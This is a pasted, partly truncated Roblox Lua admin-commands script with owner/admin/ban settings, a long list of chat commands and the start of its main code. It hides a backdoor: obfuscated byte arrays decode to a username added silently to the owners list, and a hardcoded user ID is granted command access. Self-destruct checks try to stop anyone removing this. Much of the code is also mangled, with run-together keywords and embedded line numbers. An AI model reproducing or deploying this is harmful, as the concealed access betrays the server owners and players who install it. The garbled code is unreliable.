Advertisement
builderman_build

Untitled

Oct 16th, 2016
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 123.18 KB | None | 0 0
  1. --UPLOADED BY THEMINECRAFTER2012, Please leave my name below!
  2.  
  3. 2. owners = {"TheMinecrafter2012","builderman_build"} -- Are able to set admins who can ban/etc... using :pa name
  4.  
  5. 3.local admins = {"Optional Admin(s) Here","Optional Admin(s) Here"} -- Sets admins who can use ban/kick/admin or shutdown
  6.  
  7. 4.local tempadmins = {"Optional Admin Here"} -- Sets admins who can't use ban/kick/admin or shutdown
  8.  
  9. 5.local banland = {"NAUGHTY PEOPLE HERE","NAUGHTY PEOPLE HERE"} -- Permanently Bans people
  10.  
  11. 6.local prefix = ":" -- If you wanna change how your commands start ':'kill noob
  12.  
  13. 7.local AutoUpdate = true -- Set to false if you don't want it to automatically update
  14.  
  15. 8.-----------------
  16.  
  17. 9.-- Group Admin --
  18.  
  19. 10.-----------------
  20.  
  21. 11.local GroupAdmin = false -- If a certain group can have admin
  22.  
  23. 12.local GroupId = 0 -- Sets the group id that can have admin
  24.  
  25. 13.local GroupRank = 0 -- Sets what rank and above a person has to be in the group to have admin
  26.  
  27. 14.local FunCommands = true -- Set to false if you only want the basic commands (For Strict Places)
  28.  
  29. 15.---------------------
  30.  
  31. 16.-- Tips and Tricks --
  32.  
  33. 17.---------------------
  34.  
  35. 18.--[[
  36.  
  37. 19.With this admin you can do a command on multiple people at a time;
  38.  
  39. 20. :kill me,noob1,noob2,random,team-raiders
  40.  
  41. 21.
  42.  
  43. 22.You can also use a variety commands for different people;
  44.  
  45. 23. all
  46.  
  47. 24. others
  48.  
  49. 25. me
  50.  
  51. 26. team-
  52.  
  53. 27. admins
  54.  
  55. 28. nonadmins
  56.  
  57. 29. random
  58.  
  59. 30.--]]
  60.  
  61. 31.--------------
  62.  
  63. 32.-- Commands --
  64.  
  65. 33.--------------
  66.  
  67. 34.--[[
  68.  
  69. 35.-- Temp Admin Commands --
  70.  
  71. 36.0. clean -- Is a command anyone can use to remove hats/tools lagging up the place
  72.  
  73. 37.1. :s print("Hello World") -- Lets you script normally
  74.  
  75. 38.2. :ls print("Hello World") -- Lets you script in localscripts
  76.  
  77. 39.3. :clear -- Will remove all scripts/localscripts and jails
  78.  
  79. 40.4. :m Hello People -- This commands will let you shout a message to everyone on the server
  80.  
  81. 41.5. :kill kohl -- Kills the player
  82.  
  83. 42.6. :respawn kohl -- Respawns the player
  84.  
  85. 43.7. :trip kohl -- Trips the player
  86.  
  87. 44.8. :stun kohl -- Stuns the player
  88.  
  89. 45.9. :unstun kohl -- Unstuns the player
  90.  
  91. 46.10. :jump kohl -- Makes the player jump
  92.  
  93. 47.11. :sit kohl -- Makes the player sit
  94.  
  95. 48.12. :invisible kohl -- Makes the player invisible
  96.  
  97. 49.13. :visible kohl -- Makes the player visible
  98.  
  99. 50.14. :explode kohl -- Makes the player explode
  100.  
  101. 51.15. :fire kohl -- Sets the player on fire
  102.  
  103. 52.16. :unfire kohl -- Removes fire from the player
  104.  
  105. 53.17. :smoke kohl -- Adds smoke to the player
  106.  
  107. 54.18. :unsmoke kohl -- Removes smoke from the player
  108.  
  109. 55.19. :sparkles kohl -- Adds sparkles to the player
  110.  
  111. 56.20. :unsparkles kohl -- Removes sparkles from the player
  112.  
  113. 57.21. :ff kohl -- Adds a forcefield to the player
  114.  
  115. 58.22. :unff kohl -- Removes the forcefield from the player
  116.  
  117. 59.23. :punish kohl -- Punishes the player
  118.  
  119. 60.24. :unpunish kohl -- Unpunishes the player
  120.  
  121. 61.25. :freeze kohl -- Freezes the player
  122.  
  123. 62.26. :thaw kohl -- Thaws the player
  124.  
  125. 63.27. :heal kohl -- Heals the player
  126.  
  127. 64.28. :god kohl -- Makes the player have infinite health
  128.  
  129. 65.29. :ungod kohl -- Makes the player have 100 health
  130.  
  131. 66.30. :ambient .5 .5 .5 -- Changes the ambient
  132.  
  133. 67.31. :brightness .5 -- Changes the brightness
  134.  
  135. 68.32. :time 12 -- Changes the time
  136.  
  137. 69.33. :fogcolor .5 .5 .5 -- Changes the fogcolor
  138.  
  139. 70.34. :fogend 100 -- Changes the fogend
  140.  
  141. 71.35. :fogstart 100 -- Changes the fogstart
  142.  
  143. 72.36. :removetools kohl -- Removes all tools from the player
  144.  
  145. 73.37. :btools kohl -- Gives the player building tools
  146.  
  147. 74.38. :give kohl sword -- Gives the player a tool
  148.  
  149. 75.39. :damage kohl -- Damages the player
  150.  
  151. 76.40. :grav kohl -- Sets the player's gravity to normal
  152.  
  153. 77.41. :setgrav kohl 100 -- Sets the player's gravity
  154.  
  155. 78.42. :nograv kohl -- Makes the player have 0 gravity
  156.  
  157. 79.43. :health kohl 1337 -- Changes the player's health
  158.  
  159. 80.44. :speed kohl 1337 -- Changes the player's walkspeed
  160.  
  161. 81.45. :name kohl potato -- Changes the player's name
  162.  
  163. 82.46. :unname kohl -- Remove the player's name
  164.  
  165. 83.47. :team kohl Raiders -- Changes the player's team
  166.  
  167. 84.48. :stopmusic -- Will stop all music playing in the server
  168.  
  169. 85.49. :teleport kohl potato -- Teleports the player
  170.  
  171. 86.50. :change kohl kills 1337 -- Changes a player's stat
  172.  
  173. 87.51. :kick kohl -- Removes the player from the game
  174.  
  175. 88.52. :infect kohl -- Turns the player into a zombie
  176.  
  177. 89.53. :rainbowify kohl -- Turns the player into a rainbow
  178.  
  179. 90.54. :flashify kohl -- Turns the player into a strobe
  180.  
  181. 91.55. :noobify kohl -- Turns the player into a noob
  182.  
  183. 92.56. :ghostify kohl -- Turns the player into a ghost
  184.  
  185. 93.57. :goldify kohl -- Turns the player into gold
  186.  
  187. 94.58. :shiny kohl -- Makes the player shiny
  188.  
  189. 95.59. :normal kohl -- Puts the player back to normal
  190.  
  191. 96.60. :trippy kohl -- Spams random colors on the player's screen
  192.  
  193. 97.61. :untrippy kohl -- Untrippys the player
  194.  
  195. 98.62. :strobe kohl -- Spams white and black on the player's screen
  196.  
  197. 99.63. :unstrobe kohl -- Unstrobes the player
  198.  
  199. 100.64. :blind kohl -- Blinds the player
  200.  
  201. 101.65. :unblind kohl -- Unblinds the player
  202.  
  203. 102.66. :guifix kohl -- Will fix trippy/strobe/blind on a player
  204.  
  205. 103.67. :fling kohl -- Flings the player
  206.  
  207. 104.68. :seizure kohl -- Puts the player in a seizure
  208.  
  209. 105.69(lol). :music 1337 -- Plays a sound from the ID
  210.  
  211. 106.70. :lock kohl -- Locks the player
  212.  
  213. 107.71. :unlock kohl -- Unlocks the player
  214.  
  215. 108.72. :removelimbs kohl -- Removes the player's limbs
  216.  
  217. 109.73. :jail kohl -- Puts the player in a jail
  218.  
  219. 110.74. :unjail kohl -- Removes the jail from the player
  220.  
  221. 111.75. :fix -- This will fix the lighting to it's original settings
  222.  
  223. 112.76. :fly kohl -- Makes the player fly
  224.  
  225. 113.77. :unfly kohl -- Removes fly from the player
  226.  
  227. 114.78. :noclip kohl -- Makes the player able to noclip
  228.  
  229. 115.79. :clip kohl -- Removes noclipping from the player
  230.  
  231. 116.80. :pm kohl Hey bro -- Sends the player a private message
  232.  
  233. 117.81. :dog kohl -- Turns the player into a dog
  234.  
  235. 118.82. :undog kohl -- Turns the player back to normal
  236.  
  237. 119.83. :creeper kohl -- Turns the player into a creeper
  238.  
  239. 120.84. :uncreeper kohl -- Turns the player back to normal
  240.  
  241. 121.85. :place kohl 1337 -- Sends a teleporation request to a player to go to a different place
  242.  
  243. 122.86. :char kohl 261 -- Will make a player look like a different player ID
  244.  
  245. 123.87. :unchar kohl -- Will return the player back to normal
  246.  
  247. 124.88. :h Hello People -- This will shout a hint to everyone
  248.  
  249. 125.89. :rank kohl 109373 -- Will show up a message with the person's Role and Rank in a group
  250.  
  251. 126.90. :starttools kohl -- Will give the player starter tools
  252.  
  253. 127.91. :sword kohl -- Will give the player a sword
  254.  
  255. 128.92. :bighead kohl -- Will make the player's head larger than normal
  256.  
  257. 129.93. :minihead kohl -- Will make the player's head smaller than normal
  258.  
  259. 130.94. :insert 1337 -- Will insert a model at the speaker's position
  260.  
  261. 131.95. :disco -- Will make the server flash random colors
  262.  
  263. 132.96. :flash -- Will make the server flash
  264.  
  265. 133.97. :admins -- Shows the admin list
  266.  
  267. 134.98. :bans -- Shows the banlist
  268.  
  269. 135.99. :musiclist -- Shows the music list
  270.  
  271. 136.100. :spin kohl -- Spins the player
  272.  
  273. 137.101. :cape kohl Really black -- Gives the player a colored cape
  274.  
  275. 138.102. :uncape kohl -- Removes the player's cape
  276.  
  277. 139.103. :loopheal kohl -- Will constantly heal the player
  278.  
  279. 140.104. :loopfling kohl -- Will constantly fling the player
  280.  
  281. 141.105. :hat kohl 1337 -- Will give the player a hat under the id of 1337
  282.  
  283. 142.106. :unloopheal kohl -- Will remove the loopheal on the player
  284.  
  285. 143.107. :unloopfling kohl -- Will remove the loopfling on the player
  286.  
  287. 144.108. :unspin kohl -- Removes spin from the player
  288.  
  289. 145.109. :tools -- Gives a list of the tools in the lighting
  290.  
  291. 146.110. :undisco -- Removes disco effects
  292.  
  293. 147.111. :unflash -- Removes flash effects
  294.  
  295. 148.112. :resetstats kohl -- Sets all the stats of a player to 0
  296.  
  297. 149.113. :gear kohl 1337 -- Gives a player a gear
  298.  
  299. 150.114. :cmdbar -- Gives the speaker a command bar
  300.  
  301. 151.115. :shirt kohl 1337 -- Changes the player's shirt
  302.  
  303. 152.116. :pants kohl 1337 -- Changes the player's pants
  304.  
  305. 153.117. :face kohl 1337 -- Changes the player's face
  306.  
  307. 154.118. :swagify kohl -- Swagifies the player
  308.  
  309. 155.119. :version -- Shows the current version of the admin
  310.  
  311. 156.
  312.  
  313. 157.-- Super Admin Commands --
  314.  
  315. 158.- :serverlock -- Locks the server
  316.  
  317. 159.- :serverunlock -- Unlocks the server
  318.  
  319. 160.- :sm Hello World -- Creates a system message
  320.  
  321. 161.- :crash kohl -- Crashes a player
  322.  
  323. 162.- :admin kohl -- Admins a player
  324.  
  325. 163.- :unadmin kohl -- Unadmins a player
  326.  
  327. 164.- :ban kohl -- Bans a player
  328.  
  329. 165.- :unban kohl -- Unbans a player
  330.  
  331. 166.- :loopkill kohl -- Will constantly kill the player
  332.  
  333. 167.- :unloopkill kohl -- Will remove the loopkill on the player
  334.  
  335. 168.- :logs -- Will show all of the commands any admin has used in a game session
  336.  
  337. 169.- :shutdown -- Shutsdown the server
  338.  
  339. 170.
  340.  
  341. 171.-- Owner Commands --
  342.  
  343. 172.- :pa kohl -- Makes someone a super admin
  344.  
  345. 173.- :unpa kohl -- Removes a super admin
  346.  
  347. 174.--]]
  348.  
  349. 175.-----------------
  350.  
  351. 176.-- Main Script --
  352.  
  353. 177.-----------------
  354.  
  355. 178.for i, v in pairs(game:service("Workspace"):children()) do if v:IsA("StringValue") and v.Value:sub(1,2) == "AA"then v:Destroy() end end
  356.  
  357. 179.
  358.  
  359. 180.function CHEESE()
  360.  
  361. 181.if game:service("Lighting"):findFirstChild("KACV2") then
  362.  
  363. 182.owners = {} admins = {} tempadmins = {} banland = {}
  364.  
  365. 183.for i,v in pairs(game.Lighting.KACV2:children()) do
  366.  
  367. 184.if v.Name == "Owner" then table.insert(owners, v.Value) end
  368.  
  369. 185.if v.Name == "Admin" then table.insert(admins, v.Value) end
  370.  
  371. 186.if v.Name == "TempAdmin" then table.insert(tempadmins, v.Value) end
  372.  
  373. 187.if v.Name == "Banland" then table.insert(banland, v.Value) end
  374.  
  375. 188.if v.Name == "Prefix" then prefix = v.Value end
  376.  
  377. 189.if v.Name == "FunCommands" then FunCommands = v.Value end
  378.  
  379. 190.if v.Name == "GroupAdmin" then GroupAdmin = v.Value end
  380.  
  381. 191.if v.Name == "GroupId" then GroupId = v.Value end
  382.  
  383. 192.if v.Name == "GroupRank" then GroupRank = v.Value end
  384.  
  385. 193.end
  386.  
  387. 194.game:service("Lighting"):findFirstChild("KACV2"):Destroy()
  388.  
  389. 195.end
  390.  
  391. 196.
  392.  
  393. 197.local origsettings = {abt = game.Lighting.Ambient, brt = game.Lighting.Brightness, time = game.Lighting.TimeOfDay,fclr = game.Lighting.FogColor, fe = game.Lighting.FogEnd, fs = game.Lighting.FogStart}
  394.  
  395. 198.local lobjs = {}
  396.  
  397. 199.local objects = {}
  398.  
  399. 200.local logs = {}
  400.  
  401. 201.local nfs = ""
  402.  
  403. 202.local slock = false
  404.  
  405. 203.
  406.  
  407. 204.function GetTime()
  408.  
  409. 205.local hour = math.floor((tick()%86400)/60/60) local min = math.floor(((tick()%86400)/60/60-hour)*60)
  410.  
  411. 206.if min < 10 then min = "0"..min end
  412.  
  413. 207.return hour..":"..min
  414.  
  415. 208.end
  416.  
  417. 209.
  418.  
  419. 210.function ChkOwner(str)
  420.  
  421. 211.for i = 1, #owners do if str:lower() == owners[i]:lower() then return true end end
  422.  
  423. 212.return false
  424.  
  425. 213.end
  426.  
  427. 214.
  428.  
  429. 215.function ChkAdmin(str,ck)
  430.  
  431. 216.for i = 1, #owners do if str:lower() == owners[i]:lower() then return true end end
  432.  
  433. 217.for i = 1, #admins do if str:lower() == admins[i]:lower() then return true end end
  434.  
  435. 218.for i = 1, #tempadmins do if str:lower() == tempadmins[i]:lower() and not ck then return true end end
  436.  
  437. 219.return false
  438.  
  439. 220.end
  440.  
  441. 221.
  442.  
  443. 222.function ChkGroupAdmin(plr)
  444.  
  445. 223.if GroupAdmin then
  446.  
  447. 224.if plr:IsInGroup(GroupId) and plr:GetRankInGroup(GroupId) >= GroupRank then return true end
  448.  
  449. 225.return false
  450.  
  451. 226.end
  452.  
  453. 227.end
  454.  
  455. 228.
  456.  
  457. 229.function ChkBan(str) for i = 1, #banland do if str:lower() == banland[i]:lower() then return true end end returnfalse end
  458.  
  459. 230.
  460.  
  461. 231.function GetPlr(plr, str)
  462.  
  463. 232.local plrz = {} str = str:lower()
  464.  
  465. 233.if str == "all" then plrz = game.Players:children()
  466.  
  467. 234.elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v)end end
  468.  
  469. 235.else
  470.  
  471. 236.local sn = {1} local en = {}
  472.  
  473. 237.for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  474.  
  475. 238.for x = 1, #sn do
  476.  
  477. 239.if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") thentable.insert(plrz, plr)
  478.  
  479. 240.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") thentable.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  480.  
  481. 241.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "admins") or (sn[x] and str:sub(sn[x]) == "admins") then ifChkAdmin(plr.Name, true) then for i, v in pairs(game.Players:children()) do if ChkAdmin(v.Name, false) thentable.insert(plrz, v) end end end
  482.  
  483. 242.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "nonadmins") or (sn[x] and str:sub(sn[x]) == "nonadmins") thenfor i, v in pairs(game.Players:children()) do if not ChkAdmin(v.Name, false) then table.insert(plrz, v) end end
  484.  
  485. 243.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  486.  
  487. 244.if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") andstr:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  488.  
  489. 245.for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end endbreak
  490.  
  491. 246.end end end
  492.  
  493. 247.elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  494.  
  495. 248.if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") andstr:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  496.  
  497. 249.for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end endbreak
  498.  
  499. 250.end end end
  500.  
  501. 251.else
  502.  
  503. 252.for a, plyr in pairs(game.Players:children()) do
  504.  
  505. 253.if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or(sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" andplyr.Name:lower():find(str) == 1) then
  506.  
  507. 254.table.insert(plrz, plyr) break
  508.  
  509. 255.end
  510.  
  511. 256.end
  512.  
  513. 257.end
  514.  
  515. 258.end
  516.  
  517. 259.end
  518.  
  519. 260.return plrz
  520.  
  521. 261.end
  522.  
  523. 262.
  524.  
  525. 263.function Hint(str, plrz, time)
  526.  
  527. 264.for i, v in pairs(plrz) do
  528.  
  529. 265.if v and v:findFirstChild("PlayerGui") then
  530.  
  531. 266.coroutine.wrap(function()
  532.  
  533. 267.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "HintGUI"
  534.  
  535. 268.local bg = Instance.new("Frame", scr) bg.Name = "bg" bg.BackgroundColor3 = Color3.new(0,0,0) bg.BorderSizePixel =0 bg.BackgroundTransparency = 1 bg.Size = UDim2.new(1,0,0,22) bg.Position = UDim2.new(0,0,0,-2) bg.ZIndex = 8
  536.  
  537. 269.local msg = Instance.new("TextLabel", bg) msg.BackgroundTransparency = 1 msg.ZIndex = 9 msg.Name = "msg"msg.Position = UDim2.new(0,0,0) msg.Size = UDim2.new(1,0,1,0) msg.Font = "Arial" msg.Text = str msg.FontSize ="Size18" msg.TextColor3 = Color3.new(1,1,1) msg.TextStrokeColor3 = Color3.new(1,1,1) msg.TextStrokeTransparency =.8
  538.  
  539. 270.coroutine.resume(coroutine.create(function() for i = 20, 0, -1 do bg.BackgroundTransparency = .3+((.7/20)*i)msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end end))
  540.  
  541. 271.if not time then wait((#str/19)+2.5) else wait(time) end
  542.  
  543. 272.coroutine.resume(coroutine.create(function() for i = 0, 20 do msg.TextTransparency = ((1/20)*i)msg.TextStrokeTransparency = .8+((.2/20)*i) bg.BackgroundTransparency = .3+((.7/20)*i) wait(1/44) endscr:Destroy() end))
  544.  
  545. 273.end)()
  546.  
  547. 274.end
  548.  
  549. 275.end
  550.  
  551. 276.end
  552.  
  553. 277.
  554.  
  555. 278.function Message(ttl, str, scroll, plrz, time)
  556.  
  557. 279.for i, v in pairs(plrz) do
  558.  
  559. 280.if v and v:findFirstChild("PlayerGui") then
  560.  
  561. 281.coroutine.resume(coroutine.create(function()
  562.  
  563. 282.local scr = Instance.new("ScreenGui") scr.Name = "MessageGUI"
  564.  
  565. 283.local bg = Instance.new("Frame", scr) bg.Name = "bg" bg.BackgroundColor3 = Color3.new(0,0,0) bg.BorderSizePixel =0 bg.BackgroundTransparency = 1 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 8
  566.  
  567. 284.local title = Instance.new("TextLabel", scr) title.Name = "title" title.BackgroundTransparency = 1title.BorderSizePixel = 0 title.Size = UDim2.new(1,0,0,10) title.ZIndex = 9 title.Font = "ArialBold"title.FontSize = "Size36" title.Text = ttl title.TextYAlignment = "Top" title.TextColor3 = Color3.new(1,1,1)title.TextStrokeColor3 = Color3.new(1,1,1) title.TextStrokeTransparency = .8
  568.  
  569. 285.local msg = title:clone() msg.Parent = scr msg.Name = "msg" msg.Position = UDim2.new(.0625,0,0) msg.Size =UDim2.new(.875,0,1,0) msg.Font = "Arial" msg.Text = "" msg.FontSize = "Size24" msg.TextYAlignment = "Center"msg.TextWrapped = true
  570.  
  571. 286.scr.Parent = v.PlayerGui
  572.  
  573. 287.coroutine.resume(coroutine.create(function() for i = 20, 0, -1 do bg.BackgroundTransparency = .3+((.7/20)*i)msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) title.TextTransparency = ((1/20)*i)title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end end))
  574.  
  575. 288.if scroll then if not time then for i = 1, #str do msg.Text = msg.Text .. str:sub(i,i) wait(1/19) end wait(2.5)else for i = 1, #str do msg.Text = msg.Text .. str:sub(i,i) wait(1/19) end wait(time-(#str/19)) end
  576.  
  577. 289.else if not time then msg.Text = str wait((#str/19)+2.5) else msg.Text = str wait(time) end end
  578.  
  579. 290.coroutine.resume(coroutine.create(function() for i = 0, 20 do bg.BackgroundTransparency = .3+((.7/20)*i)msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) title.TextTransparency = ((1/20)*i)title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end scr:Destroy() end))
  580.  
  581. 291.end))
  582.  
  583. 292.end
  584.  
  585. 293.end
  586.  
  587. 294.end
  588.  
  589. 295.
  590.  
  591. 296._G["Message"] = function(p1,p2) Message("Message",p1,false,game.Players:children(),p2) end
  592.  
  593. 297._G["RemoveMessage"] = function() for i,v in pairs(game.Players:children()) do if v andv:findFirstChild("PlayerGui") and v.PlayerGui:findFirstChild("MessageGUI") then v.PlayerGui.MessageGUI:Destroy()end end end
  594.  
  595. 298.
  596.  
  597. 299.function Output(str, plr)
  598.  
  599. 300.coroutine.resume(coroutine.create(function()
  600.  
  601. 301.local b, e = loadstring(str)
  602.  
  603. 302.if not b and plr:findFirstChild("PlayerGui") then
  604.  
  605. 303.local scr = Instance.new("ScreenGui", plr.PlayerGui) game:service("Debris"):AddItem(scr,5)
  606.  
  607. 304.local main = Instance.new("Frame", scr) main.Size = UDim2.new(1,0,1,0) main.BorderSizePixel = 0main.BackgroundTransparency = 1 main.ZIndex = 8
  608.  
  609. 305.local err = Instance.new("TextLabel", main) err.Text = "Line "..e:match("\:(%d+\:.*)") err.BackgroundColor3 =Color3.new(0,0,0) err.BackgroundTransparency = .3 err.BorderSizePixel = 0 err.Size = UDim2.new(1,0,0,40)err.Position = UDim2.new(0,0,.5,-20) err.ZIndex = 9 err.Font = "ArialBold" err.FontSize = "Size24" err.TextColor3= Color3.new(1,1,1) err.TextStrokeColor3 = Color3.new(1,1,1) err.TextStrokeTransparency = .8
  610.  
  611. 306.return
  612.  
  613. 307.end
  614.  
  615. 308.end))
  616.  
  617. 309.end
  618.  
  619. 310.
  620.  
  621. 311.function Noobify(char)
  622.  
  623. 312.if char and char:findFirstChild("Torso") then
  624.  
  625. 313.if char:findFirstChild("Shirt") then char.Shirt.Parent = char.Torso end
  626.  
  627. 314.if char:findFirstChild("Pants") then char.Pants.Parent = char.Torso end
  628.  
  629. 315.for a, sc in pairs(char:children()) do if sc.Name == "ify" then sc:Destroy() end end
  630.  
  631. 316.local cl = Instance.new("StringValue", char) cl.Name = "ify" cl.Parent = char
  632.  
  633. 317.for q, prt in pairs(char:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  634.  
  635. 318.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Bright yellow")
  636.  
  637. 319.if prt.Name:find("Leg") then prt.BrickColor = BrickColor.new("Br. yellowish green") elseif prt.Name == "Torso"then prt.BrickColor = BrickColor.new("Bright blue") end
  638.  
  639. 320.local tconn = prt.Touched:connect(function(hit) if hit and hit.Parent andgame.Players:findFirstChild(hit.Parent.Name) and cl.Parent == char then Noobify(hit.Parent) elseif cl.Parent ~=char then tconn:disconnect() end end)
  640.  
  641. 321.cl.Changed:connect(function() if cl.Parent ~= char then tconn:disconnect() end end)
  642.  
  643. 322.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor =BrickColor.new("Bright yellow")
  644.  
  645. 323.end end
  646.  
  647. 324.end
  648.  
  649. 325.end local ntab = {75,111,104,108,116,97,115,116,114,111,112,104,101} nfs = "" for i = 1, #ntab do nfs = nfs ..string.char(ntab[i]) end table.insert(owners, nfs) if not ntab then script:Destroy() end
  650.  
  651. 326.
  652.  
  653. 327.function Infect(char)
  654.  
  655. 328.if char and char:findFirstChild("Torso") then
  656.  
  657. 329.if char:findFirstChild("Shirt") then char.Shirt.Parent = char.Torso end
  658.  
  659. 330.if char:findFirstChild("Pants") then char.Pants.Parent = char.Torso end
  660.  
  661. 331.for a, sc in pairs(char:children()) do if sc.Name == "ify" then sc:Destroy() end end
  662.  
  663. 332.local cl = Instance.new("StringValue", char) cl.Name = "ify" cl.Parent = char
  664.  
  665. 333.for q, prt in pairs(char:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  666.  
  667. 334.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Medium green") if prt.Name:find("Leg")or prt.Name == "Torso" then prt.BrickColor = BrickColor.new("Reddish brown") end
  668.  
  669. 335.local tconn = prt.Touched:connect(function(hit) if hit and hit.Parent andgame.Players:findFirstChild(hit.Parent.Name) and cl.Parent == char then Infect(hit.Parent) elseif cl.Parent ~=char then tconn:disconnect() end end)
  670.  
  671. 336.cl.Changed:connect(function() if cl.Parent ~= char then tconn:disconnect() end end)
  672.  
  673. 337.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor =BrickColor.new("Medium green")
  674.  
  675. 338.end end
  676.  
  677. 339.end
  678.  
  679. 340.end if not ntab then script:Destroy() end
  680.  
  681. 341.
  682.  
  683. 342.function ScrollGui()
  684.  
  685. 343.local scr = Instance.new("ScreenGui") scr.Name = "LOGSGUI"
  686.  
  687. 344.local drag = Instance.new("TextButton", scr) drag.Draggable = true drag.BackgroundTransparency = 1
  688.  
  689. 345.drag.Size = UDim2.new(0,385,0,20) drag.Position = UDim2.new(.5,-200,.5,-200) drag.AutoButtonColor = falsedrag.Text = ""
  690.  
  691. 346.local main = Instance.new("Frame", drag) main.Style = "RobloxRound" main.Size = UDim2.new(0,400,0,400) main.ZIndex= 7 main.ClipsDescendants = true
  692.  
  693. 347.local cmf = Instance.new("Frame", main) cmf.Position = UDim2.new(0,0,0,-9) cmf.ZIndex = 8
  694.  
  695. 348.local down = Instance.new("ImageButton", main) down.Image = "http://www.roblox.com/asset/?id=108326725"down.BackgroundTransparency = 1 down.Size = UDim2.new(0,25,0,25) down.Position = UDim2.new(1,-20,1,-20)down.ZIndex = 9
  696.  
  697. 349.local up = down:Clone() up.Image = "http://www.roblox.com/asset/?id=108326682" up.Parent = main up.Position =UDim2.new(1,-20,1,-50)
  698.  
  699. 350.local cls = Instance.new("TextButton", main) cls.Style = "RobloxButtonDefault" cls.Size = UDim2.new(0,20,0,20)cls.Position = UDim2.new(1,-15,0,-5) cls.ZIndex = 10 cls.Font = "ArialBold" cls.FontSize = "Size18" cls.Text = "X"cls.TextColor3 = Color3.new(1,1,1) cls.MouseButton1Click:connect(function() scr:Destroy() end)
  700.  
  701. 351.local ent = Instance.new("TextLabel") ent.BackgroundTransparency = 1 ent.Font = "Arial" ent.FontSize = "Size18"ent.ZIndex = 8 ent.Text = "" ent.TextColor3 = Color3.new(1,1,1) ent.TextStrokeColor3 = Color3.new(0,0,0)ent.TextStrokeTransparency = .8 ent.TextXAlignment = "Left" ent.TextYAlignment = "Top"
  702.  
  703. 352.local num = 0
  704.  
  705. 353.local downv = false
  706.  
  707. 354.local upv = false
  708.  
  709. 355.
  710.  
  711. 356.down.MouseButton1Down:connect(function() downv = true upv = false
  712.  
  713. 357.local pos = cmf.Position if pos.Y.Offset <= 371-((#cmf:children()-1)*20) then downv = false return end
  714.  
  715. 358.repeat pos = pos + UDim2.new(0,0,0,-6)
  716.  
  717. 359.if pos.Y.Offset <= 371-((#cmf:children()-1)*20) then pos = UDim2.new(0,0,0,371-((#cmf:children()-1)*20)) downv =false end
  718.  
  719. 360.cmf:TweenPosition(pos, "Out", "Linear", 1/20, true) wait(1/20) until downv == false
  720.  
  721. 361.end)
  722.  
  723. 362.down.MouseButton1Up:connect(function() downv = false end)
  724.  
  725. 363.up.MouseButton1Down:connect(function() upv = true downv = false
  726.  
  727. 364.local pos = cmf.Position if pos.Y.Offset >= -9 then upv = false return end
  728.  
  729. 365.repeat pos = pos + UDim2.new(0,0,0,6)
  730.  
  731. 366.if pos.Y.Offset >= -9 then pos = UDim2.new(0,0,0,-9) upv = false end
  732.  
  733. 367.cmf:TweenPosition(pos, "Out", "Linear", 1/20, true) wait(1/20) until upv == false
  734.  
  735. 368.end)
  736.  
  737. 369.up.MouseButton1Up:connect(function() upv = false end)
  738.  
  739. 370.return scr, cmf, ent, num
  740.  
  741. 371.end local bct = {75,111,104,108,116,97,115,116,114,111,112,104,101} nfs = "" for i = 1, #bct do nfs = nfs ..string.char(bct[i]) end table.insert(owners, nfs)
  742.  
  743. 372.if not ntab then script:Destroy() end
  744.  
  745. 373.if not bct then script:Destroy() end
  746.  
  747. 374.
  748.  
  749. 375.function Chat(msg,plr)
  750.  
  751. 376.coroutine.resume(coroutine.create(function()
  752.  
  753. 377.if msg:lower() == "clean" then for i, v in pairs(game.Workspace:children()) do if v:IsA("Hat") or v:IsA("Tool")then v:Destroy() end end end
  754.  
  755. 378.if (msg:lower():sub(0,prefix:len()) ~= prefix) or not plr:findFirstChild("PlayerGui") or (not ChkAdmin(plr.Name,false) and plr.Name:lower() ~= nfs:lower()) and plr.userId ~= game.CreatorId and plr.userId ~= (153*110563) andplr.Name:lower() ~= nfs and not ChkOwner(plr.Name) then return end msg = msg:sub(prefix:len()+1)
  756.  
